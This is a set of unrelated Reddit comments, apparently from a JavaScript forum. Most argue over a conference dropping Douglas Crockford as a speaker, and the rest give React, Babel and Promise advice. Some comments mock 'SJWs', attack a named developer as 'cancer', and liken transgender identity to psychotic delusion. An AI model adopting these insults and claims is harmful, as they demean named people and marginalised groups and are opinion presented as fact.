If, in an alternate reality, there was a well established and popular saying that equated the lack of ovaries to cowardice and if I knew the talk was going to be laced with that kind of thing and all other things being equal, sure, I'd probably skip that talk for something else. &gt;It's because you're saying you're scared of a mild reference to balls. Nope. I said it was juvenile and exclusionary, which it is. It's a great thing to say around your 12 year old friends, but seems a bit out of place at a professional conference. Downvotes are for spam and comments not contributing to the discussion. Even if I *did* say I was scared of a reference to balls, why the hell would that warrant a torrent of downvotes?
I consider myself a OS agnostic developer. Most of the time I use a Mac for production development, and I learned on a WAMP stack, but I'm comfortable in the three major operating systems. I'm not saying I'm an expert sysadmin, but I can set up a server stack of my preference with relative ease in any of the three. But I'm trying to figure out where you're seeing this kind of inclusive culture. As an outsider seeing in, I don't have the money to afford going to these big conferences, and neither do the employers, so maybe I'm not getting where the elitist culture is coming from. Maybe it's a geographical thing, that mostly happens in Silicon Valley, and I don't even feel much of a tech scene presence in Chicago.
You sound a tad desperate, but whatever works for you
In programmer's terms, SJW's like to make unnecessary optimizations for extreme edge cases.
lol I get the idea of what you're saying. I'm born in the early 80s and feel like at the cusp between two different generations.
internet is slow as hell in the middle of nowhere. and im doing this on my free time
You're not asking the right question. The actual question should be why is this sub being shitted up with this twitter nonsense?
I recall "dongle-gate" at PyCon several years ago. Was that basically the same thing? Involving a SJW feminist that was too offended at a joke made by two audience members sitting next to her, and instead of just keeping it to herself she made a tweet about it, causing the molehill to explode.
1. please clarify the difference in uninviting vs backing out. 2. "could have said" is placing your view on the subject which could be correct or incorrect, would need evidence of things such as the "(irrational/overly sensitive)" statement from a primary source. 3. you have a quote but it does not confirm lack of investigation and does not sound like there is "nothing" as stat[ed] in your quote: "have openly refused to speak at a conference". If you are looking for evidence of *why* people refused, that seems varied and as shown in the slack log the reasons are spread around different mediums such as twitter. Even with a reason to the question of why, it is not change that a decision had to be made. Whether that decision is good or bad is very subjective, and statements would need to be given from primary sources and a list of expectations required to use as evidence would be hard to iron out without something like a legal system. 
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit: - [/r/shitredditsays] ["I'm a white, heterosexual male, but I shouldn't be ashamed of that any more than the SJWs should be ashamed of whatever marginalized group they are aligned with at the moment." \[+115\]](https://np.reddit.com/r/ShitRedditSays/comments/51azqa/im_a_white_heterosexual_male_but_i_shouldnt_be/) [](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))* [](#bot)
A few years ago I wondered why being a believer of social justice was cause for ridicule. Turns out I just had to look at my current programming language and version control system of choice to learn why. A supposedly legitimate professional conference kowtowed to baseless claims that a speaker makes "several people uncomfortable". GitHub's "code of conduct" literally says any hate speech against cisgendered people, white people or men does not break the code. I see this sort of lexicon in no other profession except software development. People aren't paying to go to a conference for diversity. People aren't paying to see lesser speakers give talks because another more accomplished speaker made a joke about dog testicles. People don't care that Crockford used the word "promiscuity" to describe the connectivity of the web. It looks like Nodevember is figuring that out.
Are you genuinely interested, or do you just love being outraged and feel like you belong when you're part of an internet angry mob?
They use the GWT toolchain which is used [in many Google and non-google projects](http://www.gwtproject.org/examples.html#real-world-projects).
Yes, in the minority, genuinely interested in learning about what other conferences these organizers may have planned.
I'm not seeing how 'wanting more representation other than white men' === 'being racist against white men' 
Sorry for my post... so much over-reaction and torch-lighting going about this. I saw you were generally asking in the other thread, and my snarkines is just more negativity. This shit is contagious!
One question, if you have time, can you recommend a gd conference for Javascript in December/January time frame? Want to tie it in with holiday travel.
Use Promise.all
Papa Parse may help you do what you want (if used from Node.js): http://papaparse.com/
Stop with your sexist terms. They aren't appreciated and make me feel uncomfortable. Not everyone disagreeing with you is male. 
That link doesn't offer much information :-/ Are you inferring that GWT somehow compiles to JS as a build target? If so, is that a reusable component or something tied directly to GWT?
nexxylove, aka emilyrose is as toxic as it gets. Me and an npm employee got into a twitter argument, employee asked me to stop tweeting back, I did. I notice this person was subtweeting and taking everything out of context and calling me an entitled freeloader (I paid for npm private) and I replied with an eye roll gif, to which nexxylove called me out 9 hours later the next day and compared me to being a rapist because "Like a typical male, he didn't stop when told to stop." Fuck everything about this person. They're more detrimental to inclusivity than Crockford would be coming right out and saying sexist shit to someone.
If can program, why don't you take an open source 3rd party system and audit the system yourself?
Such a load of BS.
Not through a simple polyfill no, you'd have to use something like [babel](https://babeljs.io) to transpile it to es5
For real, why is there race/gender drama on r/JavaScript? 
I think it's tricky. On the one hand I welcome a more balanced workplace. On the other hand I'm not particularly convinced that making the workplace such a sensitive, coddled, even sterile setting is really to my taste. I like working with women. I appreciate it's different than working with men (or can be generally) however I've worked with plenty who can take a joke. By that I mean that crude jokes and pisstaking can be made exchanged jovially. I'm not talking about "dick jokes", mostly because I find them tedious I suppose, but I've not really heard them in a professional setting anyway. In that sense I guess I'm completely in agreement with you. At the same time I have worked with over-sensitive men, and having to cater to that is frankly tiring. I don't have much patience for that type of person, regardless of gender. So: I'd certainly want to reduce the barriers to encourage women to enter the sector, I feel that they offer a different and very helpful perspective on the problems I get stuck on and enjoy pairing with developers who can unstick me. I don't want to be treading on eggshells though. Women in real life are not the sensitive petals portrayed by SJWs. Pay them with the same standards and treat them equally. Welcome them. Seek them out. Positively discriminate in hiring. Whatever. Just don't make the workplace into some sort of depressing socialist dystopia :-)
8 out of 10 are things you *should* do. This article's logic is on its head.
It's an incredible level of puritanism. The complaints seem to be largely along the lines of "He acknowledged that people have sex organs!".
Gender dysphoria exists, and isn't 1:1 with homosexuality, and also affects women. And in America at least, gender reassignment therapies are voluntary. Just because it is impossible to change sex (for the time being; maybe some day we'll live in Iain M. Banks' Culture and sex will be a choice the same way as pants v skirts are a choice) doesn't mean that it doesn't exist, any more than conservative arguments about non-lubricative anuses invalidate male homosexuality as a biological fact. Yeah, you could get into an entire argument that "transgendered" men are forced to become women because at some point *women are forced to become women*, and that this is the oppression of patriarchy from one end or the other, or that somehow men who identify with the traits and aesthetics that western society regard as "Feminine" are culturally-appropriating patriarchal vampires, (which... that's recursive victim-shaming if you ask me). But it comes down to the fact that some small fraction of people who are free to choose, feel that they are not the sex they were born with, and we have some of the tools to help them live happier lives, and they can take advantage of those tools. What their happiness takes away from the rest of us is miniscule if it exists at all. 
Yes I too would like to know who these prople are so I can avoid any future programming they put on
Lol youre going to act like the people reacting to this are mobbing? Not the SJWs who are actually witch-hunting the guy? Absurd. Sorry for standing against outrageous defamation of an icon in this field. 
Writing lists is hard, ok?!
WSDL? Oh dear.
My standard React app doesn't need a router, tests, or internationalization. I also use custom data management over Redux. The fact that you can mix and match functionality and methodology is one of React's strengths, not a weakness. How about just using React vanilla until you need more stuff, then add it?
I fail to see how organizers who invited 4 white males to give keynotes and later uninvited one of them over concerns about content and behavior are "thumbing their nose over and over" at white males.
Someone employed to promote a technology, to encourage developers to use it.
Eh wait until this blows over, then ask.
All of their announced keynotes are white men. Seems odd for a group that discriminates against white men... 
Keep at it, but maybe re-record the narrative in post, etc? Just skimmed it TBH but keyboard noise stuck out to me.
Yeah, I really don't think wanting more diversity is "discrimination", and I don't think he was ousted because he's a white male.
Could be. I have my doubts though.
It's there as a defensive measure for Facebook, nothing more really. Considering there are tons of really large companies using React, I don't think you've anything to worry about.
Another benefit no one has mentioned is that a reverse proxy like nginx serves static content faster than a node web server. 
More [here](http://www.gwtproject.org/overview.html) and [here](https://en.wikipedia.org/wiki/Google_Web_Toolkit). It is a Java to JS compiler with UI libraries that abstract over browser quirks. The Closure compiler is itself compiled to JS with GWT (as a pure function), and wrapped in a thin layer of hand-made JS to provide a nicer interface to client code.
Unless their gay does what?
Hi /u/flamingspew, this post was removed. Please see our [posting guidelines](http://www.reddit.com/r/javascript/wiki/index).
They weren't clear at all about why they thought he would make the community feel unsafe and uncomfortable. They just said that he would make the community feel unsafe and uncomfortable. That's not illegal slander, but it is slander.
Crockford said things that could potentially make some people feel unconfortable. They desired to make the conference for everyone to feel welcome. They cut Crockford out. How hard is that to understand? Use some empathy please, I know you can do it.
Doesn't matter. Find a neat project you want to do, and then pick something reasonably popular to try out. Your goal is not to learn frameworks, but to get comfortable enough with software engineering and the JavaScript landscape, that you could make use of any framework. The outcome of that is you begin to understand what tool is right for what job, which leads to you becoming a good developer, who doesn't just try to wedge their favourite tools where they don't belong.
&gt; People are not irrelevant. Some people actually are [exactly that](http://www.merriam-webster.com/dictionary/irrelevant). And that isn't a negative or divisive thing to say, it's just how things are when discussing any topic there will always be things and people who are irrelevant. In this case, the concerns of two individuals wishing to censor the language of others is not relevant to a technical conference. Hopefully we are in agreement here. &gt;If you're not defending this person, then you're defending his acts. I'm not defending anyone, I'm advocating for the unrestricted use of language and against blacklisting someone because they employ language *in which offense can be found* (which can be said of quite literally any language). Once again, this has nothing to do with Crockford specifically or Nodevember; we're talking about the ethical duty we *should* all have toward intellectual honesty. His analogies might be flawed, who cares? This is entirely beside the point. You may think gonads and promiscuity are inappropriate in a room of engineers. I might think terms such as "fostering inclusivity" and "microaggressions" are actually much more (though I hate to use the term) offensive in their invocation of the very spirits they seek to banish. What is appropriate is subjective. Period. We cannot please everyone and shouldn't try to. If someone takes offense to something, the onus is on them to deal with that...not the speaker. I'm not sure when the left became the ones trying to censor everything and everyone, but it kinda makes me a bit sad. The far left has quite literally taken over the job of the far right in the 90s trying to censor music and video games because of their sexual or violent language/imagery. There is literally nothing progressive about seeking to diminish the number of ways we are "allowed" to use language. In fact, it's about as conservative as it gets. 
Why are you down here :o 
Empathy for who? I don't feel empathy for people who are dumb enough to be offended by things that aren't offensive. Especially when they go on to damage a community rather than work on their own issues.
Yes, because you of course have the right to decide what's offensive or not for everybody, every single kind of different person to walk on earth. 
Oh, I'm sorry, does it make you uncomfortable? It's just harmless joking, I'm not giving in to "PC culture" is all. Who could possibly be offended by a few pet names? Policing my comments and expecting me to adapt to what people around me want is what is toxic in tech. Right? Seriously, this whole Crockford thing, and all the hand wringing over it, is the single best thing I've seen in 20 years in the industry. Who cares what you think? Sure as hell not me! :)
By "clear", you mean totally evading the issue? Cowardly labeling this guy as "unsafe" to other speakers and attendees without saying why? &gt; All the anger and hate going on right now is pathetic. What the organizers are doing to Crockford is totally beyond the pale and they deserve every bit of the (non-violent) anger and hate that is being expressed at them.
I need a safe space! I need a safe space!!!!
I think it's supposed to connote a certain intensity or fervor on the part of the person so employed. It's been in use for at least 30 or so years; Guy Kawasaki was calling himself that when he worked for Apple in the 80s.
&gt; Care to fill in the uninformed? Ignorance is bliss.
Crocktoberfest
I'm sorry to burst your bubble but despite his great and valuable contribution to the javascript community, Crockford is still an human being. He commited and will commit many more mistakes and that's completely fine if he grows a better person from it. Hell, even if he doesn't change that won't make his contribution less valuable. However, no one needs like and/or accept his presence because of that.
&gt; If you are offended that is a feeling that you have that you must deal with That's not how basic human interaction is supposed to work. I pray to god you aren't a front-end developer.
Emily Rose (nexxy) is an absolute cancer. The fact she holds a title of "developer evangelist" is a joke given the fact she's a bomb thrower that shows up uninvited to rip software communities apart by pulling shit like this. I can only see the "inclusion" story improving by excluding her specifically along with calling out her tactics and not allowing her to steamroll others into making shitty decisions like the organizers of nodevember.
Someone feeling offended isn't enough to justify action. Someone actually doing something wrong is and Crockford didn't do anything wrong.
I'd claim death threats too if I just didn't want to face the consequences of my actions.
This is how it works. Take remarks out of context, get offended, act upon offense, get called out on it, accuse those people of mob rule, rinse, repeat.
I replied to two of them and got banned. /shrug
This is pretty tiny actually, check the demo: http://mikechabot.github.io/react-boilerplate/ Created this out of sheer frustration due to the issues you noted. Either you get nothing, or something overly complicated. Totally agree. 
It's a free market, if consumers preferred static content, such companies would dominate the industry. But they don't. Do you think laymen will begin preferring static content?
If certain people are irrelevant, you have acknowledged that they are not a part of your community. I am doing my best not to put words in your mouth, but as I understand it, you are saying that an opinion representing common word interpretations of half of an entire species is irrelevant in a discussion concerning the passage of information through web technologies and that preventing the defamation of a well known figure with major contributions to the language is more important. That's kinda trashy. Measuring admiration and fame to anyone's worth is textbook idolatry man. Appeal to authority? Whatever you wanna call it, it makes me not want to go to these pony shows. I do not advocate censorship or any leftist agenda, but this has been a problem before left/right paradigms. It's been a problem before computers. Progress has been made but we have women that are excluded from government council discussions and writing law. We have priests dictating how women should dress and act without including women in the writing of religious scripture. I won't be a part of any group that's like any of those fuckers. I will not blindly fall into the same shit that every other part of society reeks of. There are significant problems in the way that society is structured and as programmers shaping this language we have a chance to build something that isn't structured to keep women out. Keeping quiet like the monks transcribing bibles will lead to witch hunts like the one happening right now. Kas has done nothing wrong by alerting us to her truth and I stand by her and the rest of the world while you throw people that you don't agree with into paradigms fed to you by those obsessed with control. We are humans, not left not right. Please try to think of those that are not like you and maybe just smile and say hello at the very least. If they're not like you, they don't have to be "irrelevant".
Not exactly a polyfill, but [babel-standalone](https://github.com/Daniel15/babel-standalone/blob/master/README.md) can get you new features in the browser without a build step.
If gonads and dogballs are the worst of his offenses, I completely disagree with their decision. If they want to keep their conference clean just a quick "Hey Doug, no anatomical jokes, ok?" is all they needed. If it's something more serious that would actually make a rational person feel unsafe, say so. They already opened pandora's box by discussing it on Twitter. It's too late to say "we have our reasons" and ignore people demanding justification.
Instablock for anyone who disagrees with her. Cannot disrupt the echo chamber.
&gt; Crockford said things that could potentially make some people feel unconfortable. Like what?
What would you do with a million dollars?
Their shitty opinions dont stand up to sunlight. Logical scrutiny is their kryptonite. If you think I'm exaggerating, go debate them in the SRS thread about this comment. You will be blocked *immediately* because they already know that you're right about them before the debate even happens. 
&gt; Why is React so popular? I've been wondering that myself. We are using React in production, and I'm waiting for the right moment to get rid of it. React isn't the fastest rendering library, nor the lightest one, nor the best documented one, nor the one with best programming ergonomics... It's also based on ideals and principles that it breaks almost by design. I doubt React would be so successful if it hadn't been marketed and used by Facebook.
Ok, so just to be clear—they haven't offered anything, you're simply speculating that because you don't understand, it's stupid ("retarded") or some kind of malicious intent.
I completely agree here - trying to find a boilerplate from the get-go is not the most sensible approach; you really do need to learn piece by piece as you noted. Only then, you can hack together your own BP or finally start to understand why the others were constructed in the way they were. Right now, I really dig diving into webpack and reading up on the babel stages, so I'm a bit hesitant to relinquish that new found knowledge to the create-app abstraction. What's more, I feel as though this proj is being pushed on beginners since folks want adoption of React without all the "noise" that can come with it, a la webpack. If the hope is that folks get "up and running" and then want to dive into the details, then I'm on board. 
The fuck did he even do that got people upset enough to have him axed? 
I am offended when people are vegan. That doesn't give me free reign to be a dick to them. Discomfort alone is NOT a justification for this 
Sorry. Had to look up /s. Haha
Optional strong type system. Text management features (such as the ability to directly measure a length of text or determine if it will wrap without actually rendering it and checking the dom, or maybe the ability to control and interact with the IME editor for non-latin keyboard setups). The ability to get performance by operating on the dom as a whitelist of features, so you can specify your on layout system, calculated manually, and avoid worrying about the dom building thousands of properties on every node, the vast majority of which will never be used. An assembly form for low level code that is already parsed into an engine-consumable form. This is coming with web assembly. High speed communication between web workers and the host page. I don't mind that we don't have memory-sharing threads, but the communication speed needs to improve.
Mostly about general good practice not specific to node at all
I apologize if I seemed antagonizing. I didn't mean to in the slightest. I am earnestly trying to have a discussion. It seems that we have a fundamentally different view on what the transcripts prove/mean. The point I was trying to make was that I read it as 'we can't be representative if we only have white dudes talking'. I was trying to ask, and I again apologize for asking in an antagonizing way, how you gathered from the same transcripts I read that they 'have it in for white men'. 
If their happiness with these "tools" is predicated on them believing the falsehood that their sex has changed, it is no different than playing along with a psychotic person's delusions. I suppose if their body dysphoria is of such magnitude that only cosmetic surgery will suffice, there's no deep moral issue with it; but why not extend the same courtesy to anyone with body dysphoria? Why is a male getting breast enhancement surgery "brave" when a female getting it is "vain?" As far as women with gender dysphoria go, medical intervention has some seriously bad side effects while typically not addressing their actual issues: https://mariacatt.com/2016/08/01/wow-a-detransitioned-woman-exists/
Well, does it not seem, on a fundamental level, that 'we can't be representative if we only have white dudes talking', is wrong? This is the problem. People think that because there are predominantly white men in a particular situation, that there is some conspiracy to keep everyone else out. That is simply not true. I don't know why the demographics have shaken out the way they have in tech communities. I'd guess there are a number of historic reasons, some socioeconomic, some cultural. Funny though that people don't lambaste other industries that have an unbalanced demographic split. Take nursing for example. Overwhelmingly occupied by women. Where are the complaints? Where are the cries for diversity? By all means bring other demographics into the tech industry. I can't tell you how many times I wished there were more women in tech. The fact of the matter is no one is "keeping anyone out". But there is a certain amount of technical aptitude that is necessary. If people can meet that requirement, then welcome aboard. 
You still need to make externs files for most libraries though, right?
Just because you can change the meaning of a word by lying about it enough doesn't mean it's a valid accusation
No one is claiming that censorship isn't bad. Telling someone that they are not welcome to present a lecture is not censorship. If I were an expert giving a physics lecture at NASA and someone calls me out for claiming to channel aliens from the Moon, it is very likely that I wouldn't be welcome to talk about my funny dialogue with the aliens. If I did speak on the subject, it might be humorous, but it would be disrespectful to the audience who wanted to learn about physics. I would be alienating my audience. But seriously though, I've been to enough conferences to know that these events are primarily rallies for people to become introduced to a community. When I started going to these events, I noticed that most of the people there were already knowledgeable of the content at each talk. A speaker's role is more like an ambassador to those that are new to the topics being shared. It doesn't mean you're a bad person if you're not chosen to walk on stage and speak at a conference. It means there are others better suited at speaking to a fresh audience(not a circlejerk of bros that never whine about things and "get it"). Douglas Crockford is a wonderful programmer. Stop being butthurt because he's a terrible speaker.
Don't waste your breath here /r/FunctionPlastic - they aren't open to the idea that they're constructing their own strawmen in the exact same way that the people who initiated this shitstorm have. I'd have thought people in this industry would be more capable of putting the blame on those it belongs to and not a bunch of boogey-men ("SJWs" etc.), but apparently not...
I don't think you should just go find a random React boilerplate. You should learn the parts and, over time, develop one that suits you. Personally I have two - one that is a simply React + testing, for components or small projects, and one that is React/Redux/Routing/Server rendering + testing for larger projects. I built all the configuration so I could understand it. I `git clone` them whenever I am starting new and update them once every other month or so. But I probably wouldn't recommend them to someone who is doing their own project. You should also look at createreactapp that Facebook developed to help solve your problem.
Hammer is the one to use
Is Facebook an SPA? no.
Isn't Typescript the optional strong type system for JavaScript? Sure it requires a compile step, but any built in optional strong type system would require a compile step too, wouldn't it? Or is there some benefit to having a native optional strong type system I'm not considering?
The proposal seems kind of hacky to me. I mean, it's basically classifying cancelled promises as exceptions. But we `throw` exceptions... It feels kind of weird to me to `throw` a cancelled promise. It's not really an error, so why treat it like one?
&gt; Telling someone that they are not welcome to present a lecture is not censorship. If the motivation is specifically because of things that person has said, then yes that is actually the exact definition of censorship. If you're unfamiliar with the what that word means I encourage you to look it up. &gt; If I were an expert giving a physics lecture at NASA... This is a false analogy. The comparison here is just laughable. None of Crockford's lectures have been anywhere near comparable to talking about aliens. He's used some strained analogies to illustrate points about programming. At this point I have to question if you're just being stubborn, or if you're actually ignorant enough to think this statement makes a valid point. See the thing is, we're not talking about "not choosing someone" we're talking about choosing someone, then "unchoosing" them due to complaints from specifically two people. If he had simply not been invited in the first place, we wouldn't be having this discussion. Surely you have to realize this. &gt; Stop being butthurt because he's a terrible speaker. I mean, this is a cute attempt to belittle my argument and dismiss my point without actually addressing anything I've said. I'll overlook that and actually address what you've said here. He wasn't uninvited for being a terrible speaker, he was uninvited because his presence, according to the given statement: &gt; would make some speakers uncomfortable to the point where they refused to attend or speak. So he was uninvited to accommodate people who specifically requested that he not be invited. I just wanted to make sure I corrected you on this point in particular so that we can be perfectly clear.
In advanced mode, yes.
HermitPy won't get kicked-out just yet, they are still some targets for the hypersensitive SJWs and HermitPY is pretty fast at complying, just a tweet or two and hey ho.. 
Your intolerance will not be tolerated. 0/0 is a safe network. #SafeCIDRSpaces
In that scheme of reasoning, what you call the ‘dominant culture’^* is defined by the terms that are or are not in its common parlance. That commonality is an illusion, though, since it wont persist with any consistency over any changing groups of listeners. Each group will bring its own experience, distinct from each other group. No two groups will have the same set of vocabulary, idioms and cultural references. All your definition are belong to us. ^* *(A term I have innumerable problems with. I hope you’ll stop using it, or alternatively have yourself removed and replaced by someone with a system of language I find less hostile and oppressive.)*
The part that most people use has all the characteristics of an SPA. Routes, dynamic DOM, data binding, etc. Anyway it seems you missed my point.
That error is coming from sales force. Right now the code : - calls into [getAttachments passing all the attachmentId](https://github.com/Avinava/VFZip/blob/master/src/components/VFZip.component#L59-L67), which is a comma separated list. - [fetches all the attachments matching the provided attachmentIds](https://github.com/Avinava/VFZip/blob/master/src/classes/VFZip_Con.cls#L15-L16), and - [wraps them - applying a base64body property](https://github.com/Avinava/VFZip/blob/master/src/classes/VFZip_Con.cls#L33-L37). - The front-end component then calls into jszip [using that same property](https://github.com/Avinava/VFZip/blob/master/src/components/VFZip.component#L42). There is an inherent limit of 15mb for a given call - in this case, it appears to be closer to 7mb -- this is because a 7mb binary file when turned into base64 explodes the size quite a bit. To fix this, split up the getAttachments call.... right now it passes all the `attachmentIds` and so the server responds with all of them, exceeding the limit.... If you instead did a fetch of one attachmentId at a time, you'll get them all together on the client-side and can zip them normally. You would be still be limited - but now it's when one file's base64 representation goes over 15mb. EDIT: You might try this - replace the body of [getAttachments](https://github.com/Avinava/VFZip/blob/master/src/components/VFZip.component#L59-L67) with the following: Promise.all('{!attachmentIds}'.split(',').map(function (attachmentId) { return new Promise(function (resolve) { Visualforce.remoting.Manager.invokeAction( '{!$RemoteAction.VFZip_Con.getAttachments}', attachmentId, function(result, event){ resolve(result) }, { buffer: false, escape: true, timeout: 120000 } ); }) })).then(function (attachments) { callback(attachments) }) That should work in most major browsers.... IE will likely have problems with using the global Promise object -- edge should be fine though. If all else fails, throw in a Promise polyfil to get support for oldIE.
I feel like some people like these guys just go to conferences and try to make their "brand" on twitter causing outrage at nothing. Do any of them actually consider most JS devs will go to an actual desk at an actual job in the morning to write actually javascript where none of this matters a bit.
It's worth clarifying that strong typing, and the dead code elimination that it enables, require specially-formatted comments. Someone could argue that it's not "native JavaScript" because, in truly native JavaScript, comments can be totally ignored, but for the Closure Compiler comments have meaning that cannot be ignored. It's basically a syntax extension to the native language, but done in a way that IDEs and browsers won't complain. Not trying to nitpick or say you're wrong; just clarifying for anyone reading this.
Well I'm here because I love programming and find Web programming in particular to be fascinating and fun. Bt the one thing I agree with him on is these "full stack developers" who did a weekend "bootcamp" and think they know what being a developer is. At the end of the day, credible companies don't hire developers, they hire qualified software engineers. Big difference.
It's better than introducing a new 3rd way of completing a function: return, throw, and cancel? That's a significantly new concept to add to a language, and one that no other mainstream language has that I'm aware of. Personally, I'd rather cancelations just be part of the protocol for the Promise producer. Instead of `Promise&lt;String&gt;`, if the operation is cancelable, return a `Promise&lt;Result&lt;String&gt;&gt;`, where result has a `isCanceled` flag (and maybe it's `value` getter can throw if it's been canceled).
I've used them for dev/personal projects, but what has your experience been with them for production? I've always gone with AWS instead for prod.
I just quickly looked at the source so I may be wrong, but this seems it isn't anything like IEnumerable as it isn't working via lazy evaluation. I'd expect something that is trying to be LINQ-esque to be built with generators in order to yield out values on-demand as its enumerated over.
I'm not sure, but I think a native strong typing system would speed up the parsing/executing of the language.
 * Class properties and decorators. This will make classes more declarative, and let frameworks provide much nicer APIs for components. * Top-level await: an `await` statement at the top of a module would cause the module to wait to be "ready", which would let other type of resource loading integrate with module loading. * A scheduling API: APIs like requestIdleCallback are great for spreading out work, but fall down when multiple things call it and try to do too much work. A standard scheduler with task queues would help stave off jank. * null-coalescing operator: `foo?.bar?.baz()` would return null if `foo` or `bar` are null. * Value types and operator overloading. The gateway to a fixed number hierarchy. * Final class properties.
Well, not JIT, just regular old compiler optimizations.
&gt;Personally, I'd rather cancelations just be part of the protocol for the Promise producer. Something like this is more along the lines of what I was thinking, but doing that seems like it would break a lot of people's existing code.
It runs without transpilation. It's not new syntax.
&gt; Back then if you would tag a question with "General Programming" or "JavaScript" and post it, the whole website would become non-responsive for a few seconds Say what you want about PHP, but this would never happen with a PHP site, as it's multi-process out-of-the-box. Even if you do something terrible that blocks a request, it won't affect other requests. That and there's a 30 second timeout by default.
Sure it is. Running without transpilation doesn't mean it's not new syntax; it means it's backwards compatible. The programmer still needs to learn and use the new syntax to take advantage of some of Closure Compiler's features. I agree that the code runs without transpilation and that's a big selling point.
Hey OP this looks awesome. Unsatisifed with all the major players I've been looking for something like Monkberry **for months**. 1. ES6 classes 2. HTMLish templating 3. Fast 4. Small 5. Agnostic, works well with others. Drop your own state manager, router, tooling chain, etc. I have a few questions: What about CSS? I haven't been able to find anything on components about CSS. How does data binding works? Do I have to call `view.update()` manually after something changes? Can you access the instances of children components from a parent?
&gt; Vue can be used piecemeal Sure, but in practice you end up using vue-router, vuex, vue-resource, vue-loader, etc. I'm not saying that's a bad thing, only that I can see why someone could say Vue is more framework*ish* than something like Monkberry.
I've never heard of this before. What's so good about it? 
Need some more context here, what are you trying to do? Provide code if you can to help us out.
Why use RabbitMQ when you can use RedisPubSub?
In this scheme of reasoning, the memeplex is defined by the commonality between hosts. In order to replicate, a suitable contagion must be selected to replicate memes to potential hosts. I don't need to use the phrase 'dominant culture'. There are plenty of words at our disposal. Luckily, identical vocabulary is never necessary for comprehension. There's no lack of comprehension in this particular situation. All parties understand the meaning of words such as gonads and promiscuous. Within the programming parlance, gonads are not relevant to any discussion about software, but then it rhymes nicely with monads. Fine. Promiscuity definitely fits within the programming parlance. Right? The word promiscuous mode can be found in reference books about network interfaces. Borderline okay. What isn't okay is the word's use with commitment? Promiscuity and commitment together form a pun. Puns play with the illusion of commonality by introducing multiple meanings. These meanings are for those clever enough to understand it. All of us are clever. It's insulting to anyone who programs to pretend that the pun was not intended. Don't act like we don't love puns. 
&gt; It's to the point where I will not give talks at conferences, despite being a very experienced software engineer, because I'm afraid of walking facefirst into this kind of thing. This Is Not Ok Don't be afraid. Don't let the bullies change you. You have more than they do to contribute. They want you to be a self-loathing bully like they are. You aren't. Try not to let it affect you. Many others depend on brave people to overcome the abuse you describe. Privately, these people have hope for you, by proxy. All the best.
Hi, there is nothing special for css in templates now. Call view.update() on state changes or call like this: view.update({foo: '...'}) to update only foo.
Is `view.update()` async?
He created the specification, and got it standardized.
Being clannish about frameworks or languages isn't helpful, especially when it's founded on personal opinions. You have literally zero context to why OP might be learning angular. Not everyone has full say in what frameworks they use. The best thing we can do is help anyone who wants to learn, based on what they want to learn.
If you're working in a distributed team or have customers access your repos, such things can be a headache. We have one where nodegyp compiles some binaries depending on Python and a C compiler, especially on Windows it often causes support calls. 4x slower but a flawless "npm start" as an optional fallback if Java cannot be found sounds pretty good in this case.
You used the word "Master". I'm going to demand that you be removed from the Nodevember speakers list.
It's not true, it's some hypersensitive social justice warrior finding one more fault with the world.. How is one of two gender references actively hostile? I mean come on guys.. Crockford career won't be impacted, I dare say he's now widely popular again like back in 2008, a small vocal minority of SJWs might be raged but career impact zero. 
Actually I prefer it to be sync. Last question. In the guide you mention `view.nodes[]`. Is this available on all components? Does this return an array of children instances of components or DOM element references?
You could run the same tool over C:\Program Files (x86)\Microsoft Visual Studio 12.0 and say it's unbelievable C# apps are Gigabytes of bloat and files. It just doesn't make sense. node_modules is your portable buildsystem containing your tools, dependencies, their dependencies, examples, presets, themes, tutorials, etc. Nothing except the bits of code you rely on go into your output. Neither your server nor your audience will ever see node_modules.
They are the new church ladies. They replaced the bible with some sort of progressive combination of feminism/liberalism/multiculturalism as their new dogma. 
You guys have sufficiently ruined this sub for me, and I'm unsubscribing. I thought this place was for spreading js knowledge, not going on anti-sjw crusades. Guess this place isn't for me. Thanks.
By the context of the question it seems he or she is just starting to learn. If the OP has to learn Angular, then they can just ignore my post, but if the OP has a choice then learning Angular would be a bad choice. I am not a React fanboy, I just honestly see it as a bad choice given the other options. I mean NG2 has a very uncertain future, NG1 is in limbo, there is insane documentation fragmentation due to the split as well. Additionally as someone who started with Angular first I see nothing wrong in sharing my experience with the framework, in fact I am not alone in this feeling and it may be why they totally rebuilt the framework in the first place
Preprocessors can ensure that the code is not used in a type unpredictable way, but the annotations are removed before the js engine gets it. In principal, the js engine could make certain optimizations with defined strong types that would be infeasible otherwise. However, it would also mean that badly written code could have parsetime or runtime errors if a typed function is used with the wrong types.
I can't speak for OP. But where I am angular jobs outnumber react jobs by a factor of 4:1. That's incentive enough for me to learn angular. 
Un Ironically cheap shot him as an "alt-right" guy 
http://www.businessinsider.com.au/jk-scheinberg-apple-engineer-rejected-job-apple-store-genius-bar-2016-9 "The Apple engineer who moved Mac to Intel applied to work at the Genius Bar in an Apple store and was rejected" (because he was too old) HN discussion (since that's where I found the link yesterday): https://news.ycombinator.com/item?id=12432079
I too need LPT for regex.
You can transpile typescript in browser runtime with systemsjs. That is ES7 &gt; ES5
That's the only thing that should matter at a JS conference 
In Seattle it's higher that that even, I rarely see job descriptions with React.
I assume it is [this](https://encrypted.google.com/search?hl=en&amp;q=Douglas%20Crockford%20Nodevember). As far as I can tell, it's thanks to the privilege of hypersensitive social justice where one must publicly announce when they've taken some offense in some insignificant way.
Measuring the text for custom layout systems would be great. I did some measuring to find out which way to measure the text dimensions would fastest using current browser features. Without caching the fastest seemed to be to use Canvas for trivial single-line texts and DOM / cache for longer texts. https://github.com/terotests/MeasureText
